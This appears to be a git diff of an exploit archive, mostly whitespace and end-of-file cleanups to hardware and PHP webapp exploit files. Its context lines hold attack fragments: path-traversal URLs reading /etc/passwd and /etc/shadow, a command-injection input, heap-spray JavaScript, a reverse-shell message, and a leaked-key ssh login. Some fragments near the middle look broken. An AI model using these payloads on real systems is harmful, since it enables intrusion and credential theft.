b/platforms/hardware/remote/15842.txt @@ -43,5 +43,4 @@ ee:','1764','kB','SwapTotal:','0','kB','SwapFree:','0','kB'} Since DD-WRT is also vulnerable to a public IP DNS rebinding attack, this vulnerability affects routers that have remote administration disabled as well, and can be exploited by any Web site that is viewed by an internal, unauthenticated user. The Rebind tool easily facilitates this type of rebinding attack (http://rebind.googlecode.com). -More details and a demo video available at: http://www.devttys0.com/2010/12/dd-wrt-i-know-where-you-live/ - +More details and a demo video available at: http://www.devttys0.com/2010/12/dd-wrt-i-know-where-you-live/ \ No newline at end of file diff --git a/platforms/hardware/remote/16100.txt b/platforms/hardware/remote/16100.txt index fb0e1b04d..b2880d50e 100755 --- a/platforms/hardware/remote/16100.txt +++ b/platforms/hardware/remote/16100.txt @@ -379,4 +379,4 @@ Version: GnuPG/MacGPG2 v2.0.14 (Darwin) iF4EAREIAAYFAk1JjBQACgkQQXnnBKKRMNDwoAD/drZn3b3jiAKxHxsn8YUdNzOu KgtSit4dAjrrKx41AXkA/29dkXOf0nZu4y00cBHOGhKMkyj5DAZrkT6aqyvgnZmA =4vVm ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/hardware/remote/16149.txt b/platforms/hardware/remote/16149.txt index a4aa2806c..0c3f9873d 100755 --- a/platforms/hardware/remote/16149.txt +++ b/platforms/hardware/remote/16149.txt @@ -146,4 +146,4 @@ in this advisory, please inform us as soon as possible. E-mail: securenetwork () securenetwork it GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc -Phone: +39 02 24 12 67 88 +Phone: +39 02 24 12 67 88 \ No newline at end of file diff --git a/platforms/hardware/remote/16239.txt b/platforms/hardware/remote/16239.txt index 848c0ca11..eb2cdd1d3 100755 --- a/platforms/hardware/remote/16239.txt +++ b/platforms/hardware/remote/16239.txt @@ -37,4 +37,4 @@ if ((id>0) and (id<6)): urlread(url,file) if (id==6): file=raw_input("Enter Local File Address : ") - urlread(url,file) + urlread(url,file) \ No newline at end of file diff --git a/platforms/hardware/remote/16240.txt b/platforms/hardware/remote/16240.txt index 8d122c55d..5867aba3a 100755 --- a/platforms/hardware/remote/16240.txt +++ b/platforms/hardware/remote/16240.txt @@ -14,4 +14,4 @@ Email : irancrash [ a t ] gmail [ d o t ] com Facebook : http://facebook.com/fereidani ---------------------------------------------------------------- -URL For Explore / Files And Folders : http://IP:8080//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/ +URL For Explore / Files And Folders : http://IP:8080//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/ \ No newline at end of file diff --git a/platforms/hardware/remote/16243.py b/platforms/hardware/remote/16243.py index a0b939110..f6c9c4ace 100755 --- a/platforms/hardware/remote/16243.py +++ b/platforms/hardware/remote/16243.py @@ -37,4 +37,4 @@ if ((id>0) and (id<6)): urlread(url,file) if (id==6): file=raw_input("Enter Local File Address : ") - urlread(url,file) + urlread(url,file) \ No newline at end of file diff --git a/platforms/hardware/remote/16244.py b/platforms/hardware/remote/16244.py index 6ecdbd94d..137aebac0 100755 --- a/platforms/hardware/remote/16244.py +++ b/platforms/hardware/remote/16244.py @@ -36,4 +36,4 @@ if ((id>0) and (id<6)): urlread(url,file) if (id==6): file=raw_input("Enter Local File Address : ") - urlread(url,file) + urlread(url,file) \ No newline at end of file diff --git a/platforms/hardware/remote/16245.py b/platforms/hardware/remote/16245.py index 582608617..12abf590a 100755 --- a/platforms/hardware/remote/16245.py +++ b/platforms/hardware/remote/16245.py @@ -37,4 +37,4 @@ if ((id>0) and (id<6)): urlread(url,file) if (id==6): file=raw_input("Enter Local File Address : ") - urlread(url,file) + urlread(url,file) \ No newline at end of file diff --git a/platforms/hardware/remote/16388.rb b/platforms/hardware/remote/16388.rb index ff103933f..89c451cca 100755 --- a/platforms/hardware/remote/16388.rb +++ b/platforms/hardware/remote/16388.rb @@ -212,4 +212,4 @@ class Metasploit3 < Msf::Exploit::Remote return frame end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/16854.rb b/platforms/hardware/remote/16854.rb index f8893a0b4..25e03c01b 100755 --- a/platforms/hardware/remote/16854.rb +++ b/platforms/hardware/remote/16854.rb @@ -107,4 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/16862.rb b/platforms/hardware/remote/16862.rb index 450cd6034..48a01b779 100755 --- a/platforms/hardware/remote/16862.rb +++ b/platforms/hardware/remote/16862.rb @@ -172,4 +172,4 @@ class Metasploit3 < Msf::Exploit::Remote tiff << hehe end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/16868.rb b/platforms/hardware/remote/16868.rb index 8033df6fe..34fc28edf 100755 --- a/platforms/hardware/remote/16868.rb +++ b/platforms/hardware/remote/16868.rb @@ -158,4 +158,4 @@ class Metasploit3 < Msf::Exploit::Remote tiff << hehe end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/16869.rb b/platforms/hardware/remote/16869.rb index e7816a9a0..0968802ea 100755 --- a/platforms/hardware/remote/16869.rb +++ b/platforms/hardware/remote/16869.rb @@ -174,4 +174,4 @@ class Metasploit3 < Msf::Exploit::Remote tiff << hehe end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/169.pl b/platforms/hardware/remote/169.pl index e287e6085..b0711accf 100755 --- a/platforms/hardware/remote/169.pl +++ b/platforms/hardware/remote/169.pl @@ -412,4 +412,4 @@ sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Servic } -# milw0rm.com [2004-03-28] +# milw0rm.com [2004-03-28] \ No newline at end of file diff --git a/platforms/hardware/remote/17244.txt b/platforms/hardware/remote/17244.txt index 392676890..92579153e 100755 --- a/platforms/hardware/remote/17244.txt +++ b/platforms/hardware/remote/17244.txt @@ -453,4 +453,4 @@ RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 -Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck +Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck \ No newline at end of file diff --git a/platforms/hardware/remote/17279.txt b/platforms/hardware/remote/17279.txt index dece07d13..4cda60e77 100755 --- a/platforms/hardware/remote/17279.txt +++ b/platforms/hardware/remote/17279.txt @@ -35,4 +35,4 @@ http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00 http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00 - http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00 + http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00 \ No newline at end of file diff --git a/platforms/hardware/remote/17290.txt b/platforms/hardware/remote/17290.txt index 3de76cd77..f53bb112f 100755 --- a/platforms/hardware/remote/17290.txt +++ b/platforms/hardware/remote/17290.txt @@ -59,6 +59,4 @@ Authentication bypass - upload file: DEMO video: -http://www.youtube.com/watch?v=QZtiuYyA8XU - - +http://www.youtube.com/watch?v=QZtiuYyA8XU \ No newline at end of file diff --git a/platforms/hardware/remote/17356.txt b/platforms/hardware/remote/17356.txt index 4cd725bbd..1e54d1f1b 100755 --- a/platforms/hardware/remote/17356.txt +++ b/platforms/hardware/remote/17356.txt @@ -57,4 +57,4 @@ VENDOR STATUS ========================= == EOF == == http://sec.stanev.org == - ========================= + ========================= \ No newline at end of file diff --git a/platforms/hardware/remote/17422.txt b/platforms/hardware/remote/17422.txt index 4c7f1213a..e8d2aabff 100755 --- a/platforms/hardware/remote/17422.txt +++ b/platforms/hardware/remote/17422.txt @@ -43,5 +43,4 @@ ShellVision - www.shellvision.com -------------------------------------------------------------------- -http://target.com/file?file=/etc/shadow - +http://target.com/file?file=/etc/shadow \ No newline at end of file diff --git a/platforms/hardware/remote/17635.rb b/platforms/hardware/remote/17635.rb index 49679f82a..ad8e26c36 100755 --- a/platforms/hardware/remote/17635.rb +++ b/platforms/hardware/remote/17635.rb @@ -292,4 +292,4 @@ class Metasploit3 < Msf::Auxiliary end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/17636.rb b/platforms/hardware/remote/17636.rb index 872c345b2..246d802c4 100755 --- a/platforms/hardware/remote/17636.rb +++ b/platforms/hardware/remote/17636.rb @@ -185,4 +185,4 @@ class Metasploit3 < Msf::Auxiliary end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/17670.py b/platforms/hardware/remote/17670.py index 7f4e82200..d7c5a6b1d 100755 --- a/platforms/hardware/remote/17670.py +++ b/platforms/hardware/remote/17670.py @@ -115,4 +115,4 @@ if __name__ == '__main__': print "[+] W00t The Passwd is ", password main(host, port) -# Exploit written by Ali Elouafiq , Exploit-DB , 2011 +# Exploit written by Ali Elouafiq , Exploit-DB , 2011 \ No newline at end of file diff --git a/platforms/hardware/remote/18172.rb b/platforms/hardware/remote/18172.rb index 76848dea0..78b19bcce 100755 --- a/platforms/hardware/remote/18172.rb +++ b/platforms/hardware/remote/18172.rb @@ -61,4 +61,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/18291.txt b/platforms/hardware/remote/18291.txt index a04208392..fcea128b0 100755 --- a/platforms/hardware/remote/18291.txt +++ b/platforms/hardware/remote/18291.txt @@ -7,6 +7,4 @@ # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others # CVE : No CVE US-CERT VU#723755 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18291.tar.gz (reaver-1.1.tar.gz) - - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file diff --git a/platforms/hardware/remote/18673.txt b/platforms/hardware/remote/18673.txt index 726edfbba..42cb4eb92 100755 --- a/platforms/hardware/remote/18673.txt +++ b/platforms/hardware/remote/18673.txt @@ -196,4 +196,4 @@ for (i=0; i<700; i++){ x = x + unescape("%u0c0c%u0c0c"); } obj.SelectDirectory(x); - + \ No newline at end of file diff --git a/platforms/hardware/remote/18675.txt b/platforms/hardware/remote/18675.txt index 2627671f7..3f70c0e61 100755 --- a/platforms/hardware/remote/18675.txt +++ b/platforms/hardware/remote/18675.txt @@ -146,4 +146,4 @@ for (i=0; i<15000; i++){ x = x + "&"; } obj.OpenFileDlg(x); - + \ No newline at end of file diff --git a/platforms/hardware/remote/1889.txt b/platforms/hardware/remote/1889.txt index 9dfdf320e..523d598f4 100755 --- a/platforms/hardware/remote/1889.txt +++ b/platforms/hardware/remote/1889.txt @@ -31,4 +31,4 @@ passphrase wlan1 passphrase AnewBadPassPhrase # Several lines removed. -# milw0rm.com [2006-06-08] +# milw0rm.com [2006-06-08] \ No newline at end of file diff --git a/platforms/hardware/remote/18893.py b/platforms/hardware/remote/18893.py index 8f646681e..3bd4eae58 100755 --- a/platforms/hardware/remote/18893.py +++ b/platforms/hardware/remote/18893.py @@ -93,5 +93,4 @@ send_Exec() s.close # Exit -zprint('Exit') - +zprint('Exit') \ No newline at end of file diff --git a/platforms/hardware/remote/19091.py b/platforms/hardware/remote/19091.py index f318505cf..c7e088809 100755 --- a/platforms/hardware/remote/19091.py +++ b/platforms/hardware/remote/19091.py @@ -31,4 +31,4 @@ ipaddr=raw_input("Enter the IP address of the F5: ") subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait() if os.path.isfile("priv.key"): - os.remove("priv.key") + os.remove("priv.key") \ No newline at end of file diff --git a/platforms/hardware/remote/19099.rb b/platforms/hardware/remote/19099.rb index 3c16ff533..f8b946a4d 100755 --- a/platforms/hardware/remote/19099.rb +++ b/platforms/hardware/remote/19099.rb @@ -146,6 +146,4 @@ LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS -----END RSA PRIVATE KEY----- EOF end -end - - +end \ No newline at end of file diff --git a/platforms/hardware/remote/19444.txt b/platforms/hardware/remote/19444.txt index 1683277a8..095c765d6 100755 --- a/platforms/hardware/remote/19444.txt +++ b/platforms/hardware/remote/19444.txt @@ -6,5 +6,4 @@ Via the web interface for Dragon-Fire inside the IPONE field type your desired c |echo 'uname -a' -The output of the command will then be displayed in the right hand window of the IDS WWW interface. - +The output of the command will then be displayed in the right hand window of the IDS WWW interface. \ No newline at end of file diff --git a/platforms/hardware/remote/19554.c b/platforms/hardware/remote/19554.c index cf6dcfb9b..171f34fa7 100755 --- a/platforms/hardware/remote/19554.c +++ b/platforms/hardware/remote/19554.c @@ -174,4 +174,4 @@ Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Disca perror ("sendpkt_udp"); err ("Error sending the UDP packet.\n"); } - } + } \ No newline at end of file diff --git a/platforms/hardware/remote/19555.pl b/platforms/hardware/remote/19555.pl index 2b6538e4a..1bf82b94d 100755 --- a/platforms/hardware/remote/19555.pl +++ b/platforms/hardware/remote/19555.pl @@ -59,4 +59,4 @@ Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Disca exit; } - &ascend_kill($ARGV[0]); + &ascend_kill($ARGV[0]); \ No newline at end of file diff --git a/platforms/hardware/remote/19831.rb b/platforms/hardware/remote/19831.rb index 271ba0028..efef2f9a3 100755 --- a/platforms/hardware/remote/19831.rb +++ b/platforms/hardware/remote/19831.rb @@ -190,7 +190,4 @@ class Metasploit3 < Msf::Auxiliary rescue ::EOFError end end -end - - - +end \ No newline at end of file diff --git a/platforms/hardware/remote/19832.rb b/platforms/hardware/remote/19832.rb index d7845c5ac..a79f35be7 100755 --- a/platforms/hardware/remote/19832.rb +++ b/platforms/hardware/remote/19832.rb @@ -87,4 +87,4 @@ class Metasploit3 < Msf::Auxiliary rescue ::LocalJumpError end end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/19882.pl b/platforms/hardware/remote/19882.pl index c5fa4c9e6..e2f05bba9 100755 --- a/platforms/hardware/remote/19882.pl +++ b/platforms/hardware/remote/19882.pl @@ -561,5 +561,4 @@ sub cisco14 # Cisco IOS HTTP server DoS Vulnerability print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); -} - +} \ No newline at end of file diff --git a/platforms/hardware/remote/20067.c b/platforms/hardware/remote/20067.c index 391ce2b56..9f5581025 100755 --- a/platforms/hardware/remote/20067.c +++ b/platforms/hardware/remote/20067.c @@ -198,15 +198,4 @@ sizeof(sockstruct)); scur = sfirst; return (1); -}; - - - - - - - - - - - +}; \ No newline at end of file diff --git a/platforms/hardware/remote/20330.pl b/platforms/hardware/remote/20330.pl index e65b83601..bbab083d0 100755 --- a/platforms/hardware/remote/20330.pl +++ b/platforms/hardware/remote/20330.pl @@ -561,4 +561,4 @@ sub cisco14 # Cisco IOS HTTP server DoS Vulnerability print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); -} +} \ No newline at end of file diff --git a/platforms/hardware/remote/2034.txt b/platforms/hardware/remote/2034.txt index 32b9bc652..ba069aa56 100755 --- a/platforms/hardware/remote/2034.txt +++ b/platforms/hardware/remote/2034.txt @@ -2,4 +2,4 @@ BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2034.tgz (07182006-btvoyager.tgz) -# milw0rm.com [2006-07-18] +# milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/platforms/hardware/remote/20369.sh b/platforms/hardware/remote/20369.sh index 2541e08d8..526a3b882 100755 --- a/platforms/hardware/remote/20369.sh +++ b/platforms/hardware/remote/20369.sh @@ -29,5 +29,4 @@ while true echo PASV echo PASV sleep 1 -done - +done \ No newline at end of file diff --git a/platforms/hardware/remote/2048.pl b/platforms/hardware/remote/2048.pl index b147c4368..99ce7f24c 100755 --- a/platforms/hardware/remote/2048.pl +++ b/platforms/hardware/remote/2048.pl @@ -191,4 +191,4 @@ EOF exit(1); } -# milw0rm.com [2006-07-20] +# milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/hardware/remote/20565.c b/platforms/hardware/remote/20565.c index 5439dcd92..7f8a0697e 100755 --- a/platforms/hardware/remote/20565.c +++ b/platforms/hardware/remote/20565.c @@ -76,4 +76,4 @@ Certain versions of HP JetDirect enabled printers provide a function (PJL comman printf("Sent %d bytes\n",bytes_sent); close(sockfd); - } + } \ No newline at end of file diff --git a/platforms/hardware/remote/20975.pl b/platforms/hardware/remote/20975.pl index b581eb003..6fadee885 100755 --- a/platforms/hardware/remote/20975.pl +++ b/platforms/hardware/remote/20975.pl @@ -41,4 +41,4 @@ sub sendraw { select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } -} +} \ No newline at end of file diff --git a/platforms/hardware/remote/20976.c b/platforms/hardware/remote/20976.c index c170e2342..1bedce00d 100755 --- a/platforms/hardware/remote/20976.c +++ b/platforms/hardware/remote/20976.c @@ -78,4 +78,4 @@ int main (int argc, char *argv[]) { } printf ("Thanks...\n"); exit(0); -} +} \ No newline at end of file diff --git a/platforms/hardware/remote/20977.pl b/platforms/hardware/remote/20977.pl index c8a635eb1..ce2a7b2fa 100755 --- a/platforms/hardware/remote/20977.pl +++ b/platforms/hardware/remote/20977.pl @@ -94,4 +94,4 @@ sub scanEnd { print "\nScanned $ipcount ip addresses, $vuln addresses found vulnerable.\n"; if ($vuln > 0) {print "Check ios.out for vulnerable addresses.";} die "\n"; - } + } \ No newline at end of file diff --git a/platforms/hardware/remote/20978.pl b/platforms/hardware/remote/20978.pl index dd0044ac4..b0a661a57 100755 --- a/platforms/hardware/remote/20978.pl +++ b/platforms/hardware/remote/20978.pl @@ -565,5 +565,4 @@ sub cisco14 # Cisco IOS HTTP server DoS Vulnerability print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); -} - +} \ No newline at end of file diff --git a/platforms/hardware/remote/21011.pl b/platforms/hardware/remote/21011.pl index c1b98da89..0864a0a12 100755 --- a/platforms/hardware/remote/21011.pl +++ b/platforms/hardware/remote/21011.pl @@ -31,5 +31,4 @@ $paddr = sockaddr_in(23, $iesspass(); close(FILE1); close(SOCK); -exit 0; - +exit 0; \ No newline at end of file diff --git a/platforms/hardware/remote/21015.pl b/platforms/hardware/remote/21015.pl index c88591676..52aefe7e6 100755 --- a/platforms/hardware/remote/21015.pl +++ b/platforms/hardware/remote/21015.pl @@ -42,4 +42,4 @@ sub sendraw { select(STDOUT); close(S); return @in; } else { return ""; } } -# Spidermark: sensepostdata fw1 +# Spidermark: sensepostdata fw1 \ No newline at end of file diff --git a/platforms/hardware/remote/2136.txt b/platforms/hardware/remote/2136.txt index bd80e29cc..7f834c127 100755 --- a/platforms/hardware/remote/2136.txt +++ b/platforms/hardware/remote/2136.txt @@ -54,4 +54,4 @@ Vendor Contact: 17 July 2006 - NNL request status update, no reply 01 Aug 2006 - NNL releases vuln report, notifies vendor of release -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/platforms/hardware/remote/2145.txt b/platforms/hardware/remote/2145.txt index ac06d02ae..c8494af9e 100755 --- a/platforms/hardware/remote/2145.txt +++ b/platforms/hardware/remote/2145.txt @@ -54,4 +54,4 @@ chmod 777 /mnt/smb/ Greetz to all noypi and phteam ^^, .............eof................. -# milw0rm.com [2006-08-08] +# milw0rm.com [2006-08-08] \ No newline at end of file diff --git a/platforms/hardware/remote/21513.c b/platforms/hardware/remote/21513.c index 3e1ad5f97..01c36bbda 100755 --- a/platforms/hardware/remote/21513.c +++ b/platforms/hardware/remote/21513.c @@ -138,7 +138,4 @@ int main(int argc, char *argv[]) { checktelindus (ntohl(start_ip)); return (0); -} - - - +} \ No newline at end of file diff --git a/platforms/hardware/remote/21944.pl b/platforms/hardware/remote/21944.pl index ac3366800..04bfe1390 100755 --- a/platforms/hardware/remote/21944.pl +++ b/platforms/hardware/remote/21944.pl @@ -562,5 +562,4 @@ sub cisco14 # Cisco IOS HTTP server DoS Vulnerability print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n"); close($sockd2); exit(1); -} - +} \ No newline at end of file diff --git a/platforms/hardware/remote/21983.c b/platforms/hardware/remote/21983.c index 5efc5d51e..7a58f25f9 100755 --- a/platforms/hardware/remote/21983.c +++ b/platforms/hardware/remote/21983.c @@ -86,4 +86,4 @@ int main() } return 0; -} +} \ No newline at end of file diff --git a/platforms/hardware/remote/22244.txt b/platforms/hardware/remote/22244.txt index 05ac9d7bb..cda7337e5 100755 --- a/platforms/hardware/remote/22244.txt +++ b/platforms/hardware/remote/22244.txt @@ -7,5 +7,4 @@ function exploit(){ window.location = "view-source:http://www.example.com/dummy.html?reboot=1"; } [/script] -[input type="button" value="disconnect" onClick="exploit();"] - +[input type="button" value="disconnect" onClick="exploit();"] \ No newline at end of file diff --git a/platforms/hardware/remote/22271.c b/platforms/hardware/remote/22271.c index d18a95591..86d92e103 100755 --- a/platforms/hardware/remote/22271.c +++ b/platforms/hardware/remote/22271.c @@ -810,4 +810,4 @@ void usage(char *s) { fprintf(stderr,"\t%s\n",targets[i].description); exit (1); -} +} \ No newline at end of file diff --git a/platforms/hardware/remote/22453.txt b/platforms/hardware/remote/22453.txt index 35556ee44..83c00247c 100755 --- a/platforms/hardware/remote/22453.txt +++ b/platforms/hardware/remote/22453.txt @@ -15,4 +15,4 @@ xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"> - + \ No newline at end of file diff --git a/platforms/hardware/remote/23377.txt b/platforms/hardware/remote/23377.txt index a38d34931..2c04eb967 100755 --- a/platforms/hardware/remote/23377.txt +++ b/platforms/hardware/remote/23377.txt @@ -4,4 +4,4 @@ Multiple cross-site scripting vulnerabilities have been reported in the FortiGat These issues could be exploited by enticing an administrative user to follow a malicious link that includes hostile HTML and script code as values for URI parameters. If such a link is followed, the hostile code may be rendered in the administrator's browser. This could lead to theft of cookie-based authentication credentials, which contain the username and MD5 hash of the password, allowing for full compromise of the firewall. -https://www.example.com/firewall/policy/policy?fzone=internal&tzone=dmz1 +https://www.example.com/firewall/policy/policy?fzone=internal&tzone=dmz1 \ No newline at end of file diff --git a/platforms/hardware/remote/23735.py b/platforms/hardware/remote/23735.py index 26a6d9f2c..fe3976c80 100755 --- a/platforms/hardware/remote/23735.py +++ b/platforms/hardware/remote/23735.py @@ -129,6 +129,4 @@ request = opener.open( resp ).read() time.sleep(30) -print "[+] Done, check your netcat reverse shell on ip [%s] port [%s]" % ( lhost, lport ) - - +print "[+] Done, check your netcat reverse shell on ip [%s] port [%s]" % ( lhost, lport ) \ No newline at end of file diff --git a/platforms/hardware/remote/23855.txt b/platforms/hardware/remote/23855.txt index bb2981f9a..a867f4ebb 100755 --- a/platforms/hardware/remote/23855.txt +++ b/platforms/hardware/remote/23855.txt @@ -134,5 +134,4 @@ drwxr-xr-x 7 0 0 1024 Jan 1 1970 var / # echo pwnd! :) & exit pwnd! :) Connection closed by foreign host. -root@debian:~# - +root@debian:~# \ No newline at end of file diff --git a/platforms/hardware/remote/24494.rb b/platforms/hardware/remote/24494.rb index ab02a600a..2f8b85994 100755 --- a/platforms/hardware/remote/24494.rb +++ b/platforms/hardware/remote/24494.rb @@ -291,5 +291,4 @@ class Metasploit3 < Msf::Exploit::Remote # Accessor for our TCP payload stager attr_accessor :service -end - +end \ No newline at end of file diff --git a/platforms/hardware/remote/24974.rb b/platforms/hardware/remote/24974.rb index bc2cf7782..064131c28 100755 --- a/platforms/hardware/remote/24974.rb +++ b/platforms/hardware/remote/24974.rb @@ -362,4 +362,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/hardware/remote/254.c b/platforms/hardware/remote/254.c index fa75aafad..bafecbd93 100755 --- a/platforms/hardware/remote/254.c +++ b/platforms/hardware/remote/254.c @@ -259,4 +259,4 @@ int main(int argc, char *argv[]) { } -// milw0rm.com [2001-01-19] +// milw0rm.com [2001-01-19] \ No newline at end of file diff --git a/platforms/hardware/remote/25949.pl b/platforms/hardware/remote/25949.pl index 34eac7cda..2c9e1bac5 100755 --- a/platforms/hardware/remote/25949.pl +++ b/platforms/hardware/remote/25949.pl @@ -35,5 +35,4 @@ $port=5060; $hisiaddr = inet_aton($phone_ip) ; $hispaddr = sockaddr_in($port, $hisiaddr); send(SOCKET, $MESG, 0,$hispaddr ) || warn "send $host $!\n"; -} - +} \ No newline at end of file diff --git a/platforms/hardware/remote/2638.c b/platforms/hardware/remote/2638.c index 0cdd14576..3fdacfaf7 100755 --- a/platforms/hardware/remote/2638.c +++ b/platforms/hardware/remote/2638.c @@ -230,4 +230,4 @@ int main (int argc, char *argv[]){ exit(0); } -// milw0rm.com [2006-10-24] +// milw0rm.com [2006-10-24] \ No newline at end of file diff --git a/platforms/hardware/remote/27203.pl b/platforms/hardware/remote/27203.pl index 0ec6eddb7..23bd6f97b 100755 --- a/platforms/hardware/remote/27203.pl +++ b/platforms/hardware/remote/27203.pl @@ -47,4 +47,4 @@ die "Could not create socket: $!\n" unless $sock; print $sock $data; read($sock, $ret, 600); print($ret."\n"); -close($sock); +close($sock); \ No newline at end of file diff --git a/platforms/hardware/remote/28056.txt b/platforms/hardware/remote/28056.txt index 2f9bb2b82..3923bb9a3 100755 --- a/platforms/hardware/remote/28056.txt +++ b/platforms/hardware/remote/28056.txt @@ -13,4 +13,4 @@ Shodanhq.com shows >290.000 entries for the ROSSSH search term. The 50 megs Mikrotik package including the all research items can be downloaded here: http://www.farlight.org/mikropackage.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28056.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28056.zip \ No newline at end of file diff --git a/platforms/hardware/remote/29273.pl b/platforms/hardware/remote/29273.pl index feedbd89c..abb8e5f76 100755 --- a/platforms/hardware/remote/29273.pl +++ b/platforms/hardware/remote/29273.pl @@ -535,5 +535,4 @@ found: mov edi, 0x804ee4b jmp edi -=cut - +=cut \ No newline at end of file diff --git a/platforms/hardware/remote/294.pl b/platforms/hardware/remote/294.pl index f6d645a11..805bad1d1 100755 --- a/platforms/hardware/remote/294.pl +++ b/platforms/hardware/remote/294.pl @@ -169,4 +169,4 @@ $rs.=$rline; close $remote; } -# milw0rm.com [2004-04-28] +# milw0rm.com [2004-04-28] \ No newline at end of file diff --git a/platforms/hardware/remote/29735.rb b/platforms/hardware/remote/29735.rb index 9eedf5a0b..acd14d11f 100755 --- a/platforms/hardware/remote/29735.rb +++ b/platforms/hardware/remote/29735.rb @@ -90,6 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end - - +end \ No newline at end of file diff --git a/platforms/hardware/remote/30650.txt b/platforms/hardware/remote/30650.txt index 02aa8af94..38fc86368 100755 --- a/platforms/hardware/remote/30650.txt +++ b/platforms/hardware/remote/30650.txt @@ -26,4 +26,4 @@ m=audio 5070 RTP/AVP 3 0 110 5 a=rtpmap:3 GSM/8000/1 a=rtpmap:0 PCMU/8000/1 a=rtpmap:110 speex/8000/1 -a=rtpmap:5 DVI4/8000/1 +a=rtpmap:5 DVI4/8000/1 \ No newline at end of file diff --git a/platforms/hardware/remote/30652.txt b/platforms/hardware/remote/30652.txt index 43a47d537..c1c9cce2d 100755 --- a/platforms/hardware/remote/30652.txt +++ b/platforms/hardware/remote/30652.txt @@ -18,4 +18,4 @@ snmpset -Os -c private -v 1 10.0.0.1 system.sysName.0 s long_hostname When the hostname has been changed, issue the following command to demonstrate this issue to crash affected devices: -telnet 10.0.0.1 515 +telnet 10.0.0.1 515 \ No newline at end of file diff --git a/platforms/hardware/remote/30740.html b/platforms/hardware/remote/30740.html index c8f6bf362..1d6c466ce 100755 --- a/platforms/hardware/remote/30740.html +++ b/platforms/hardware/remote/30740.html @@ -75,8 +75,4 @@ onclick="window.open('http://bthomehub.home/cgi/b/lan/fjgfgfgh')">
-
- - - - + \ No newline at end of file diff --git a/platforms/hardware/remote/30833.html b/platforms/hardware/remote/30833.html index c4b639ad3..fda561271 100755 --- a/platforms/hardware/remote/30833.html +++ b/platforms/hardware/remote/30833.html @@ -26,4 +26,4 @@ The payload in the example is ">
Powered By Ashiyane Security Corporation www.Ashiyane.ir - + \ No newline at end of file diff --git a/platforms/php/webapps/28667.txt b/platforms/php/webapps/28667.txt index 26b5c1992..2172e07ac 100755 --- a/platforms/php/webapps/28667.txt +++ b/platforms/php/webapps/28667.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t BirdBlog 1.4.0 and prior versions are reported vulnerable. -http://www.example.com/[path]/comment.php?entryid=<"."$ARGV[4]"."$times"]); -}; +}; \ No newline at end of file diff --git a/platforms/php/webapps/2883.txt b/platforms/php/webapps/2883.txt index 6135a6439..bafbca1ca 100755 --- a/platforms/php/webapps/2883.txt +++ b/platforms/php/webapps/2883.txt @@ -122,4 +122,4 @@ |---------------------------------------| \{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/ -# milw0rm.com [2006-12-02] +# milw0rm.com [2006-12-02] \ No newline at end of file diff --git a/platforms/php/webapps/28830.pl b/platforms/php/webapps/28830.pl index d37cea3a8..663f2f3a1 100755 --- a/platforms/php/webapps/28830.pl +++ b/platforms/php/webapps/28830.pl @@ -74,4 +74,4 @@ host.\n\n"; print " "; $cmd = ; -} +} \ No newline at end of file diff --git a/platforms/php/webapps/2884.txt b/platforms/php/webapps/2884.txt index 19026a084..6715c69e9 100755 --- 